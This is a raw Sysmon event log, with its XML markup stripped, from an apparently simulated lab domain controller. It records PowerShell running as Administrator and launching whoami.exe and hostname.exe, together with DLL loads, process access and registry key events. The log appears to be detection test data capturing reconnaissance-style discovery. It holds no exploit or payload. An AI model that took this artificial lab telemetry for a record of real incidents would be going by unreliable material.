734700x800000000000000057346493Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057346492Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 12241200x800000000000000057346491Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 10341000x800000000000000057346490Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057346489Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057346488Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.509{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 12241200x800000000000000057346487Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.509{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346486Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.509{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057346485Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.509{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 10341000x800000000000000057346484Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.509{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057346483Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.509{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+30ef8c9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572d22(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257295d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303ac8b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2593341(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25751e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2565f01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2573443(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572fb5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572d22(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257295d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303ac8b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64) 154100x800000000000000057346482Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.483{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 18141800x800000000000000057346481Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:34.471{8B6011A9-C6FA-616E-9B35-01000000F101}300<Anonymous Pipe>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 12241200x800000000000000057346480Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057346479Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057346478Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 17141700x800000000000000057346477Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:34.471{8B6011A9-C6FA-616E-9B35-01000000F101}300<Anonymous Pipe>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 12241200x800000000000000057346476Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346475Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346474Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346473Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346472Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346471Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346470Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346469Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346468Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346467Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346466Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346465Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057346464Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.471{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 12241200x800000000000000057346463Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346462Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346461Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346460Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346459Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346458Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346457Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346456Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 534500x800000000000000057346455Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.471{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXE 12241200x800000000000000057346454Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\system32\HOSTNAME.EXEHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000057346453Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.471{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\nlaapi.dll10.0.14393.3808 (rs1_release.200707-2105)Network Location Awareness 2Microsoft® Windows® Operating SystemMicrosoft Corporationnlaapi.dllMD5=63EB5F68082B8C8C392E5DAC1D4EC678,SHA256=58EC364601FA6FE26525D8ADB44B7EDEFCFB73E72897C77B6E37F73E1C7BF871trueMicrosoft WindowsValid 734700x800000000000000057346452Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.471{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\winrnr.dll10.0.14393.0 (rs1_release.160715-1616)LDAP RnR Provider DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationwinrnrMD5=B0DE13ABF238AB28E963629B977A012F,SHA256=43288C8A658C2F0CB0CB1C9D874506D6CEEF455AAB68CE2EF0D685DE8E3BA0C3trueMicrosoft WindowsValid 12241200x800000000000000057346451Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\system32\HOSTNAME.EXEHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057346450Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\system32\HOSTNAME.EXEHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057346449Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\system32\HOSTNAME.EXEHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000057346448Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.471{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000057346447Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.471{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 12241200x800000000000000057346446Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057346445Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.471{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 12241200x800000000000000057346444Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057346443Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057346442Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057346441Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346440Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346439Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346438Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346437Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346436Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346435Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346434Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346433Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346432Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057346431Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.471{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\NapiNSP.dll10.0.14393.0 (rs1_release.160715-1616)E-mail Naming Shim ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationnapinsp.dllMD5=71514D9A6350A37B4F0BAA6ACB751771,SHA256=5DB99D6784900D85BB4A62E9F40B4EC628054D41B38A5E93F80C7A8BB066EBBBtrueMicrosoft WindowsValid 12241200x800000000000000057346430Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346429Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057346428Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.456{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exeMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1trueMicrosoft WindowsValid 12241200x800000000000000057346427Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346426Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346425Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346424Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346423Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346422Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346421Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346420Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 